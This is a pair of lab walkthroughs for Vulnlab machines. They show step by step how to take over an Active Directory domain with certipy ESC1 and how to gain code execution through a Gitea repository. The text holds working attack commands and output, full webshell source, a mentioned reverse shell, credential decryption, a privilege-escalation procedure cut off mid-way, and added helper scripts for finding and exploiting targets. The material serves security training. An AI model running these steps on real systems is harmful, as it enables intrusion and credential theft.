Impacket v0.11.0 - Copyright 2023 Fortra

Type help for list of commands
# use Notes
# ls
drw-rw-rw-          0  Mon Jul 24 00:03:16 2023 .
drw-rw-rw-          0  Wed Jul 26 11:54:14 2023 ..
-rw-rw-rw-        248  Mon Jul 24 00:05:56 2023 ToDo.txt
# cat ToDo.txt
Thomas,

after convincing the finance department to get rid of their ancienct banking software
it is finally time to clean up the mess they made. We should start with the pre created
computer account. That one is older than me.

Best

James

I found a great blog post by TrustedSec explaining how to abuse pre-created computer accounts.

┌──(puck㉿kali)-[~/vulnlab/retro]
└─$ crackmapexec smb retro.vl -u 'trainee' -p 'trainee' --rid-brute 
SMB         dc.retro.nl     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB         dc.retro.nl     445    DC               [+] retro.vl\trainee:trainee 
SMB         dc.retro.nl     445    DC               [+] Brute forcing RIDs
SMB         dc.retro.nl     445    DC               498: RETRO\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         dc.retro.nl     445    DC               500: RETRO\Administrator (SidTypeUser)
SMB         dc.retro.nl     445    DC               501: RETRO\Guest (SidTypeUser)
SMB         dc.retro.nl     445    DC               502: RETRO\krbtgt (SidTypeUser)
SMB         dc.retro.nl     445    DC               512: RETRO\Domain Admins (SidTypeGroup)
SMB         dc.retro.nl     445    DC               513: RETRO\Domain Users (SidTypeGroup)
SMB         dc.retro.nl     445    DC               514: RETRO\Domain Guests (SidTypeGroup)
SMB         dc.retro.nl     445    DC               515: RETRO\Domain Computers (SidTypeGroup)
SMB         dc.retro.nl     445    DC               516: RETRO\Domain Controllers (SidTypeGroup)
SMB         dc.retro.nl     445    DC               517: RETRO\Cert Publishers (SidTypeAlias)
SMB         dc.retro.nl     445    DC               518: RETRO\Schema Admins (SidTypeGroup)
SMB         dc.retro.nl     445    DC               519: RETRO\Enterprise Admins (SidTypeGroup)
SMB         dc.retro.nl     445    DC               520: RETRO\Group Policy Creator Owners (SidTypeGroup)
SMB         dc.retro.nl     445    DC               521: RETRO\Read-only Domain Controllers (SidTypeGroup)
SMB         dc.retro.nl     445    DC               522: RETRO\Cloneable Domain Controllers (SidTypeGroup)
SMB         dc.retro.nl     445    DC               525: RETRO\Protected Users (SidTypeGroup)
SMB         dc.retro.nl     445    DC               526: RETRO\Key Admins (SidTypeGroup)
SMB         dc.retro.nl     445    DC               527: RETRO\Enterprise Key Admins (SidTypeGroup)
SMB         dc.retro.nl     445    DC               553: RETRO\RAS and IAS Servers (SidTypeAlias)
SMB         dc.retro.nl     445    DC               571: RETRO\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         dc.retro.nl     445    DC               572: RETRO\Denied RODC Password Replication Group (SidTypeAlias)
SMB         dc.retro.nl     445    DC               1000: RETRO\DC$ (SidTypeUser)
SMB         dc.retro.nl     445    DC               1101: RETRO\DnsAdmins (SidTypeAlias)
SMB         dc.retro.nl     445    DC               1102: RETRO\DnsUpdateProxy (SidTypeGroup)
SMB         dc.retro.nl     445    DC               1104: RETRO\trainee (SidTypeUser)
SMB         dc.retro.nl     445    DC               1106: RETRO\BANKING$ (SidTypeUser)
SMB         dc.retro.nl     445    DC               1107: RETRO\jburley (SidTypeUser)
SMB         dc.retro.nl     445    DC               1108: RETRO\HelpDesk (SidTypeGroup)
SMB         dc.retro.nl     445    DC               1109: RETRO\tblack (SidTypeUser)
                                                                                              
┌──(puck㉿kali)-[~/vulnlab/retro]
└─$ 

Computer accounts created with the "Assign this computer account as a pre-Windows 2000 computer" option get a predictable password: the computer account name in lowercase, without the trailing $. BANKING$ is the only non-DC machine account in the RID list, so the candidate is banking.

crackmapexec smb retro.vl -u 'BANKING$' -p 'banking'    
SMB         retro.vl   445    DC               [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB         retro.vl   445    DC               [-] retro.vl\BANKING$:banking STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT 
crackmapexec smb retro.vl -u 'BANKING$' -p 'bankings'
SMB         retro.vl   445    DC               [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB         retro.vl   445    DC               [-] retro.vl\BANKING$:bankings STATUS_LOGON_FAILURE

The two responses differ in a useful way: STATUS_LOGON_FAILURE is a wrong password, while STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT means the password is correct but the account has never been used for a logon. The TrustedSec article explains that the account becomes usable once its password is changed, and recommends doing the change over RPC/SAMR (RPC over SMB) because the other methods error out on such an account. impacket-changepasswd supports that with the -p rpc-samr flag.

impacket-changepasswd 'retro.vl/BANKING$':banking@retro.vl -newpass Password12345 -dc-ip 10.10.106.112 -p rpc-samr
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Changing the password of retro.vl\BANKING$
[*] Connecting to DCE/RPC as retro.vl\BANKING$
[*] Password was changed successfully.
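To turn the steps above into something repeatable, here is an added example (my code, not from the writeup or the TrustedSec article) that takes crackmapexec --rid-brute output, lists every machine account with its pre-Windows 2000 candidate password, and interprets the NT status crackmapexec prints when the candidate is tried. The sample lines are copied from this writeup; the verdict texts are my own, and the 14-character truncation in pre2000_password reflects my understanding of the documented behaviour for long computer names.

```python
"""Pre-created computer accounts: candidates from RID-brute output and status triage
(added example, not part of the writeup)."""
import re

RID_LINE = re.compile(r"\b(?P<rid>\d+):\s+(?P<dom>[^\\\s]+)\\(?P<name>\S+)\s+\((?P<kind>\w+)\)")
AUTH_LINE = re.compile(r"\[(?P<mark>[+-])\]\s+(?P<dom>\S+?)\\(?P<user>[^:\s]+):(?P<pw>\S*)\s*(?P<status>STATUS_\w+)?")

# My reading of the NT status values crackmapexec prints for an SMB logon attempt.
VERDICTS = {
    None: "valid credentials",
    "STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT": "password is correct: pre-created machine account, rotate its password over SAMR before use",
    "STATUS_LOGON_FAILURE": "wrong password",
    "STATUS_ACCOUNT_DISABLED": "account is disabled",
    "STATUS_ACCOUNT_LOCKED_OUT": "account locked out, stop guessing",
}

# Sample lines copied from the writeup above.
SAMPLE_RID_BRUTE = r"""
SMB         dc.retro.nl     445    DC               1000: RETRO\DC$ (SidTypeUser)
SMB         dc.retro.nl     445    DC               1104: RETRO\trainee (SidTypeUser)
SMB         dc.retro.nl     445    DC               1106: RETRO\BANKING$ (SidTypeUser)
SMB         dc.retro.nl     445    DC               1107: RETRO\jburley (SidTypeUser)
SMB         dc.retro.nl     445    DC               1108: RETRO\HelpDesk (SidTypeGroup)
"""

SAMPLE_AUTH_OUTPUT = r"""
SMB         retro.vl   445    DC               [-] retro.vl\BANKING$:banking STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT
SMB         retro.vl   445    DC               [-] retro.vl\BANKING$:bankings STATUS_LOGON_FAILURE
SMB         retro.vl   445    DC               [+] retro.vl\trainee:trainee
"""


def pre2000_password(computer):
    """Default password of a pre-Windows 2000 computer account: lowercase name, no $,
    at most 14 characters (assumption: truncation rule for long names)."""
    return computer.rstrip("$").lower()[:14]


def candidate_machine_creds(rid_brute_output):
    """(account, candidate password) for every machine account in the RID-brute output."""
    creds = []
    for m in RID_LINE.finditer(rid_brute_output):
        if m.group("kind") == "SidTypeUser" and m.group("name").endswith("$"):
            creds.append((m.group("name"), pre2000_password(m.group("name"))))
    return creds


def triage(auth_output):
    """Attach a verdict to each crackmapexec authentication result line."""
    results = []
    for m in AUTH_LINE.finditer(auth_output):
        status = m.group("status")
        results.append({
            "user": m.group("user"),
            "password": m.group("pw"),
            "status": status,
            "verdict": VERDICTS.get(status, f"unhandled status {status}"),
        })
    return results


if __name__ == "__main__":
    for account, candidate in candidate_machine_creds(SAMPLE_RID_BRUTE):
        print(f"try {account} with password {candidate!r}")
    for r in triage(SAMPLE_AUTH_OUTPUT):
        print(f"{r['user']}:{r['password']} -> {r['verdict']}")
```

DC$ is listed too because a RID dump cannot tell a domain controller from a workstation; it is harmless to keep in the candidate list since the check is a single logon attempt per account.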

ADCS check

I always sync the system clock with the DC first, since Kerberos rejects requests when the clock skew exceeds a few minutes (five by default).

┌──(puck㉿kali)-[~]
└─$ sudo ntpdate retro.vl      
2024-06-03 19:23:00.526214 (+0200) -1.338499 +/- 0.011652 retro.vl 10.10.108.116 s1 no-leap
CLOCK: time stepped by -1.338499

 

┌──(puck㉿kali)-[~] 
└─$ certipy-ad find -u 'BANKING$'@retro.vl -p Password12345 -dc-ip 10.10.108.116 -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'retro-DC-CA' via CSRA
[!] Got error while trying to get CA configuration for 'retro-DC-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'retro-DC-CA' via RRP
[*] Got CA configuration for 'retro-DC-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : retro-DC-CA
    DNS Name                            : DC.retro.vl
    Certificate Subject                 : CN=retro-DC-CA, DC=retro, DC=vl
    Certificate Serial Number           : 7A107F4C115097984B35539AA62E5C85
    Certificate Validity Start          : 2023-07-23 21:03:51+00:00
    Certificate Validity End            : 2028-07-23 21:13:50+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : RETRO.VL\Administrators
      Access Rights
        ManageCertificates              : RETRO.VL\Administrators
                                          RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
        ManageCa                        : RETRO.VL\Administrators
                                          RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
        Enroll                          : RETRO.VL\Authenticated Users

Look for vulnerable templates:

➜  retro certipy-ad find -vulnerable -u 'BANKING$'@retro.vl -p Password12345 -dc-ip 10.10.108.116 -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'retro-DC-CA' via CSRA
[!] Got error while trying to get CA configuration for 'retro-DC-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'retro-DC-CA' via RRP
[*] Got CA configuration for 'retro-DC-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : retro-DC-CA
    DNS Name                            : DC.retro.vl
    Certificate Subject                 : CN=retro-DC-CA, DC=retro, DC=vl
    Certificate Serial Number           : 7A107F4C115097984B35539AA62E5C85
    Certificate Validity Start          : 2023-07-23 21:03:51+00:00
    Certificate Validity End            : 2028-07-23 21:13:50+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : RETRO.VL\Administrators
      Access Rights
        ManageCertificates              : RETRO.VL\Administrators
                                          RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
        ManageCa                        : RETRO.VL\Administrators
                                          RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
        Enroll                          : RETRO.VL\Authenticated Users
Certificate Templates
  0
    Template Name                       : RetroClients
    Display Name                        : Retro Clients
    Certificate Authorities             : retro-DC-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : None
    Private Key Flag                    : 16842752
    Extended Key Usage                  : Client Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 4096
    Permissions
      Enrollment Permissions
        Enrollment Rights               : RETRO.VL\Domain Admins
                                          RETRO.VL\Domain Computers
                                          RETRO.VL\Enterprise Admins
      Object Control Permissions
        Owner                           : RETRO.VL\Administrator
        Write Owner Principals          : RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
                                          RETRO.VL\Administrator
        Write Dacl Principals           : RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
                                          RETRO.VL\Administrator
        Write Property Principals       : RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
                                          RETRO.VL\Administrator
    [!] Vulnerabilities
      ESC1                              : 'RETRO.VL\\Domain Computers' can enroll, enrollee supplies subject and template allows client authentication

certipy-ad has flagged one template as vulnerable to ESC1.

ESC1 means a low-privileged principal can enroll in a template that is valid for client authentication and lets the enrollee supply the subject (the EnrolleeSuppliesSubject flag), so the requester can put any account's UPN in the subject alternative name. Here Domain Computers can enroll, and BANKING$ is a domain computer, so we request a certificate carrying the administrator's UPN.

certipy-ad req -u 'BANKING$'@retro.vl -p Password12345 -dc-ip 10.10.108.116 -ca retro-DC-CA -template RetroClients -upn administrator@retro.vl               
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x80094811 - CERTSRV_E_KEY_LENGTH - The public key does not meet the minimum size required by the specified certificate template.
[*] Request ID is 16

The request fails with CERTSRV_E_KEY_LENGTH: the public key does not meet the minimum size required by the template. Looking back at the certipy output, RetroClients requires a minimum RSA key length of 4096 bits, while certipy requests with a 2048-bit key by default.

Fortunately, certipy-ad lets us set the RSA key length with the -key-size flag.

certipy-ad req -u 'BANKING$'@retro.vl -p Password12345 -dc-ip 10.10.108.116 -ca retro-DC-CA -template RetroClients -upn administrator@retro.vl -key-size 4096
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 17
[*] Got certificate with UPN 'administrator@retro.vl'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
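As an added example (my code, not from the writeup or from certipy), the script below turns the manual reading of the certipy find output into a check: it parses the Certificate Templates section into one dict per template, applies the ESC1 conditions, and reports the key size a request must use so the CERTSRV_E_KEY_LENGTH error above is avoided. In SAMPLE_FIND_OUTPUT the RetroClients block is copied from the writeup (trimmed); the StaffUser template is constructed as a non-vulnerable counter-example, and LOW_PRIV is my own list of principals to treat as low-privileged.

```python
"""ESC1 check over certipy `find` text output (added example, not part of the writeup)."""
import re

LOW_PRIV = {"Domain Users", "Domain Computers", "Authenticated Users", "Everyone"}
KEY_VALUE = re.compile(r"^(?P<indent>\s*)(?P<key>[^:]+?)\s*:\s?(?P<val>.*)$")

# RetroClients copied from the writeup; StaffUser is a constructed counter-example.
SAMPLE_FIND_OUTPUT = r"""
Certificate Templates
  0
    Template Name                       : RetroClients
    Display Name                        : Retro Clients
    Certificate Authorities             : retro-DC-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Extended Key Usage                  : Client Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Minimum RSA Key Length              : 4096
    Permissions
      Enrollment Permissions
        Enrollment Rights               : RETRO.VL\Domain Admins
                                          RETRO.VL\Domain Computers
                                          RETRO.VL\Enterprise Admins
      Object Control Permissions
        Owner                           : RETRO.VL\Administrator
  1
    Template Name                       : StaffUser
    Display Name                        : Staff User
    Certificate Authorities             : retro-DC-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Extended Key Usage                  : Client Authentication
                                          Secure Email
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Minimum RSA Key Length              : 2048
    Permissions
      Enrollment Permissions
        Enrollment Rights               : RETRO.VL\Domain Users
"""


def _convert(val):
    if val in ("True", "False"):
        return val == "True"
    return int(val) if val.isdigit() else val


def parse_templates(text):
    """One dict per template; values continued on following lines become lists."""
    templates, current, last_key, key_indent = [], None, None, 0
    for raw in text.splitlines():
        if not raw.strip():
            continue
        m = KEY_VALUE.match(raw)
        if m:
            key, val = m.group("key").strip(), m.group("val").strip()
            if key == "Template Name":
                current = {}
                templates.append(current)
            if current is None:          # CA section before the first template
                continue
            current[key] = _convert(val)
            last_key, key_indent = key, len(m.group("indent"))
            continue
        indent = len(raw) - len(raw.lstrip())
        if current is not None and last_key and indent > key_indent + 2:
            prev = current[last_key]     # continuation line of the previous value
            current[last_key] = (prev if isinstance(prev, list) else [prev]) + [raw.strip()]
        else:
            last_key = None              # section header such as "Permissions"
    return templates


def _as_list(v):
    return v if isinstance(v, list) else ([] if v in ("", None) else [v])


def esc1_findings(templates, low_priv=LOW_PRIV, default_key_size=2048):
    """Templates meeting every ESC1 condition, with the low-privileged enrollers and
    the RSA key size to pass to certipy req -key-size."""
    findings = []
    for t in templates:
        client_auth = t.get("Client Authentication") is True or t.get("Any Purpose") is True
        enrollers = [p for p in _as_list(t.get("Enrollment Rights")) if p.split("\\", 1)[-1] in low_priv]
        if not (t.get("Enabled") is True and client_auth
                and t.get("Enrollee Supplies Subject") is True
                and t.get("Requires Manager Approval") is False
                and t.get("Authorized Signatures Required", 1) == 0
                and enrollers):
            continue
        findings.append({
            "template": t["Template Name"],
            "enroll_as": enrollers,
            "key_size": max(default_key_size, int(t.get("Minimum RSA Key Length") or 0)),
        })
    return findings


if __name__ == "__main__":
    for f in esc1_findings(parse_templates(SAMPLE_FIND_OUTPUT)):
        print(f"ESC1: {f['template']} enrollable by {', '.join(f['enroll_as'])}; request with -key-size {f['key_size']}")
```

Feed it the saved output of certipy-ad find -stdout; the key_size value is what the -key-size flag in the next command needs.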

This works. The auth command of certipy uses the certificate for PKINIT and obtains a TGT as administrator; it then also recovers the account's NT hash. Note the line "Certificate has no object SID": a DC in full enforcement mode for strong certificate mapping (KB5014754) would refuse a certificate without the SID extension, so this path relies on the DC still accepting the weaker UPN mapping.

certipy-ad auth -pfx administrator.pfx -dc-ip 10.10.108.116                                                                      
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@retro.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@retro.vl': *******************************:*******************************

We now have an administrator certificate (and the NT hash recovered with it), which we can use to authenticate to the domain controller.

┌──(puck㉿kali)-[~]
└─$ evil-winrm -i retro.vl -u 'Administrator' -H '<REDACTED>' 
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> hostname
DC
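As an added defensive check, not part of the original writeup or of certipy: the conditions certipy reports for ESC1 can be audited directly from a template's settings, and the same function tells you which single change closes the chain. The script below is example code written for this page; the Template fields mirror what certipy prints, the RetroClients values are taken from the output above (manager approval and signature count are not shown in the excerpt and are assumed to be at their defaults), and the AUTH_EKUS and BROAD_PRINCIPALS lists are constructed for the audit.

```python
"""Audit an AD CS certificate template for the ESC1 preconditions (constructed example)."""
from dataclasses import dataclass, replace

# EKUs that let the issued certificate be used for logon. An empty EKU set (or
# "Any Purpose") is treated as allowing authentication, the way certipy does.
AUTH_EKUS = {"Client Authentication", "PKINIT Client Authentication",
             "Smart Card Logon", "Any Purpose"}
# Constructed list of principals treated as "low privileged" by this audit.
BROAD_PRINCIPALS = {"Domain Users", "Domain Computers", "Authenticated Users", "Everyone"}


@dataclass(frozen=True)
class Template:
    name: str
    enabled: bool
    enrollee_supplies_subject: bool   # CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT in msPKI-Certificate-Name-Flag
    ekus: frozenset                   # extended key usages, as certipy prints them
    requires_manager_approval: bool
    authorized_signatures_required: int
    enrollment_rights: frozenset      # group names (domain prefix stripped) holding the Enroll right


def audit_esc1(t: Template) -> dict:
    """Report whether every ESC1 precondition holds and which change would break the chain."""
    broad = sorted(t.enrollment_rights & BROAD_PRINCIPALS)
    allows_auth = not t.ekus or bool(t.ekus & AUTH_EKUS)
    conditions = {
        "low-privileged principal can enroll": bool(broad),
        "enrollee supplies subject": t.enrollee_supplies_subject,
        "authentication EKU present": allows_auth,
        "no manager approval": not t.requires_manager_approval,
        "no authorized signature required": t.authorized_signatures_required == 0,
    }
    vulnerable = t.enabled and all(conditions.values())
    remediation = []
    if vulnerable:
        # Any single one of these closes ESC1; the first is the usual fix.
        remediation = [
            "clear EnrolleeSuppliesSubject so the CA builds the subject from AD",
            "remove %s from the template's Enroll ACE" % ", ".join(broad),
            "require manager approval or an authorized signature for issuance",
        ]
    return {
        "template": t.name,
        "vulnerable": vulnerable,
        "conditions_met": [k for k, v in conditions.items() if v],
        "broad_enrollers": broad,
        "remediation": remediation,
    }


def harden(t: Template) -> Template:
    """Return a copy with the usual ESC1 fix applied: the enrollee may no longer supply the subject."""
    return replace(t, enrollee_supplies_subject=False)


# Values taken from the certipy output on the page; manager approval and the
# signature count are not shown in the excerpt and are assumed to be defaults.
RETRO_CLIENTS = Template(
    name="RetroClients",
    enabled=True,
    enrollee_supplies_subject=True,
    ekus=frozenset({"Client Authentication"}),
    requires_manager_approval=False,
    authorized_signatures_required=0,
    enrollment_rights=frozenset({"Domain Computers"}),
)

if __name__ == "__main__":
    for tpl in (RETRO_CLIENTS, harden(RETRO_CLIENTS)):
        report = audit_esc1(tpl)
        print(report["template"], "ESC1:", report["vulnerable"])
        for fix in report["remediation"]:
            print("  -", fix)
```

Run against the RetroClients values the audit reports all five conditions met and lists the three fixes; the hardened copy, with only EnrolleeSuppliesSubject cleared, is no longer flagged, which is why that one flag is the usual remediation.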

That’s all.

.

vulnlab-lock

We have Gitea running on port 3000. There is an interesting script, repos.py, inside the dev-scripts repository of the ellen.freeman user (http://lock.vl:3000/ellen.freeman/dev-scripts/src/branch/main/repos.py), which looks like it is using a Gitea access token. If we go to the commits we can see the Gitea access token is still there in the initial commit:

➜  lock python3 repos.py <http://lock.vl:3000>
Repositories:
- ellen.freeman/dev-scripts
- ellen.freeman/website
curl -H 'Authorization: token <REDACTED>' http://10.10.113.72:3000/api/v1/user/repos | jq
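As an added example, not part of the original writeup or of the dev-scripts repository: the token was recovered from the first commit even though the current file no longer showed it, which is exactly the gap a history scan closes. The Python below parses `git log -p` output and flags added lines carrying a 40-hex token or a literal Authorization header. The sample log, the token value and the commit ids are all constructed, and the patterns are an assumption about what a Gitea token looks like.

```python
"""Scan `git log -p` output for secrets that were committed and later removed (constructed example)."""
import re
from dataclasses import dataclass

# Constructed sample: a script that embedded an API token in its first commit and
# switched to an environment variable in the second. The token and commit ids are fake.
SAMPLE_GIT_LOG = """\
commit aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Author: ellen.freeman <ellen.freeman@lock.vl>

    initial commit

diff --git a/repos.py b/repos.py
--- /dev/null
+++ b/repos.py
@@ -0,0 +1,4 @@
+import requests
+TOKEN = "d3b07384d113edec49eaa6238ad5ff00aabbccdd"
+# curl -H "Authorization: token d3b07384d113edec49eaa6238ad5ff00aabbccdd" http://lock.vl:3000/api/v1/user/repos
+r = requests.get(BASE + "/api/v1/user/repos", headers={"Authorization": "token " + TOKEN})
commit bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
Author: ellen.freeman <ellen.freeman@lock.vl>

    read token from the environment instead

diff --git a/repos.py b/repos.py
--- a/repos.py
+++ b/repos.py
@@ -1,4 +1,5 @@
 import requests
-TOKEN = "d3b07384d113edec49eaa6238ad5ff00aabbccdd"
+import os
+TOKEN = os.environ["GITEA_TOKEN"]
"""

# Assumed shapes: Gitea (and classic GitHub) tokens are 40 hex characters, and a
# header that carries the literal token rather than a variable is a leak by itself.
HEX40 = re.compile(r"(?<![0-9a-fA-F])[0-9a-fA-F]{40}(?![0-9a-fA-F])")
PATTERNS = {
    "40-hex API token (Gitea/GitHub style)": HEX40,
    "literal Authorization header": re.compile(
        r"Authorization['\"]?\s*[:=]\s*['\"]?(?:token|Bearer)\s+[A-Za-z0-9_\-]{16,}",
        re.IGNORECASE),
}
COMMIT_LINE = re.compile(r"^commit ([0-9a-f]{7,40})")


@dataclass
class Finding:
    commit: str    # abbreviated commit id the secret was added in
    file: str      # path of the file it was added to
    pattern: str   # which pattern matched
    snippet: str   # the added line with 40-hex runs masked, safe to put in a report


def scan_git_log(log_text: str) -> list:
    """Walk every commit in `git log -p` output and flag added lines that match a secret pattern."""
    findings = []
    commit = file = "?"
    for line in log_text.splitlines():
        m = COMMIT_LINE.match(line)
        if m:
            commit = m.group(1)[:7]
            continue
        if line.startswith("+++ b/"):
            file = line[len("+++ b/"):]
            continue
        # Only lines that introduced content can introduce a secret; "+++" is a file header.
        if not line.startswith("+") or line.startswith("+++"):
            continue
        added = line[1:]
        for name, pat in PATTERNS.items():
            if pat.search(added):
                masked = HEX40.sub(lambda h: h.group(0)[:6] + "...", added)
                findings.append(Finding(commit, file, name, masked))
    return findings


def commits_with_secrets(log_text: str) -> set:
    """Commits that need rewriting (and whose tokens need revoking), regardless of the current tree."""
    return {f.commit for f in scan_git_log(log_text)}


if __name__ == "__main__":
    for f in scan_git_log(SAMPLE_GIT_LOG):
        print(f"{f.commit} {f.file}: {f.pattern}: {f.snippet}")
```

On the constructed log the scanner reports three findings, all in the first commit and none in the commit that "fixed" the file: the token is still in the repository history, so the right response is to revoke it, not just to remove the line. The scanner reads plain text, so it can be fed from `git log -p --all` on a real clone.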

 

 

There is a "website" repo.

➜  lock git config --global http.extraHeader "Authorization: token <REDACTED>"
➜  lock git clone http://lock.vl:3000/ellen.freeman/website
Cloning into 'website'...
remote: Enumerating objects: 165, done.
remote: Counting objects: 100% (165/165), done.
remote: Compressing objects: 100% (128/128), done.
remote: Total 165 (delta 35), reused 153 (delta 31), pack-reused 0
Receiving objects: 100% (165/165), 7.16 MiB | 1.78 MiB/s, done.
Resolving deltas: 100% (35/35), done.

.

We upload a webshell:

┌──(puck㉿kali)-[~/vulnlab/lock/website]
└─$ ls
assets  changelog.txt  cmdasp.aspx  index.html  readme.md
                                                                                                       
┌──(puck㉿kali)-[~/vulnlab/lock/website]
└─$ cat cmdasp.aspx
<%@ Page Language="C#" Debug="true" Trace="false" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script Language="c#" runat="server">
void Page_Load(object sender, EventArgs e)
{
}
string ExcuteCmd(string arg)
{
ProcessStartInfo psi = new ProcessStartInfo();
psi.FileName = "cmd.exe";
psi.Arguments = "/c "+arg;
psi.RedirectStandardOutput = true;
psi.UseShellExecute = false;
Process p = Process.Start(psi);
StreamReader stmrdr = p.StandardOutput;
string s = stmrdr.ReadToEnd();
stmrdr.Close();
return s;
}
void cmdExe_Click(object sender, System.EventArgs e)
{
Response.Write("<pre>");
Response.Write(Server.HtmlEncode(ExcuteCmd(txtArg.Text)));
Response.Write("</pre>");
}
</script>
<HTML>
<HEAD>
<title>awen asp.net webshell</title>
</HEAD>
<body >
<form id="cmd" method="post" runat="server">
<asp:TextBox id="txtArg" style="Z-INDEX: 101; LEFT: 405px; POSITION: absolute; TOP: 20px" runat="server" Width="250px"></asp:TextBox>
<asp:Button id="testing" style="Z-INDEX: 102; LEFT: 675px; POSITION: absolute; TOP: 18px" runat="server" Text="excute" OnClick="cmdExe_Click"></asp:Button>
<asp:Label id="lblText" style="Z-INDEX: 103; LEFT: 310px; POSITION: absolute; TOP: 22px" runat="server">Command:</asp:Label>
</form>
</body>
</HTML>

<!-- Contributed by Dominic Chell (http://digitalapocalypse.blogspot.com/) -->
<!--    http://michaeldaw.org   04/2007    -->
                                                                                                       
┌──(puck㉿kali)-[~/vulnlab/lock/website]
└─$ 

With the webshell inside the git repository, we can push it to Gitea and it will get deployed to the web server.

git config --global user.name ellen.freeman
git config --global user.email ellen.freeman@lock.vl
git status
git add aspshell.aspx
git status
git commit -m "Update"
[main 13d3506] Update
 1 file changed, 45 insertions(+)
 create mode 100644 shell.aspx
➜  website git:(main) git push
Enumerating objects: 4, done.
Counting objects: 100% (4/4), done.
Delta compression using up to 2 threads
Compressing objects: 100% (3/3), done.
Writing objects: 100% (3/3), 1.41 KiB | 1.41 MiB/s, done.
Total 3 (delta 1), reused 0 (delta 0), pack-reused 0
remote: . Processing 1 references
remote: Processed 1 references in total
To http://vl.lock:3000/ellen.freeman/website.git
   73cdcc1..13d3506  main -> main

 

After pushing, we visit http://lock.vl/cmdasp.aspx and run a base64-encoded reverse shell back to my Kali box.

.

This is an mRemoteNG config file belonging to the gale.dekarios user. However, the password is encrypted. A quick Google search for “mremoteng password decrypt” leads to https://github.com/gquere/mRemoteNG_password_decrypt, a tool that decrypts mRemoteNG configuration files. Running it gives us the decrypted password:

➜  lock python3 mremoteng_decrypt.py config.xml
Name: RDP/Gale
Hostname: Lock
Username: Gale.Dekarios
Password: <REDACTED>

RDP into the machine:

➜  lock xfreerdp /u:gale.dekarios /d:WORKGROUP /p:'<REDACTED>' /v:lock.vl /size:1280x720

 

Exploiting PDF24 to get SYSTEM

We’ll need the SetOpLock.exe binary, available in this GitHub repository.

After downloading the SetOpLock.exe binary to the box, we proceed as follows.

Step 1

Start an oplock so the file gets locked when the repair process wants to write to it.

.\SetOpLock.exe "C:\Program Files\PDF24\faxPrnInst.log" r

Step 2

Run the MSI installer to trigger the repair process.

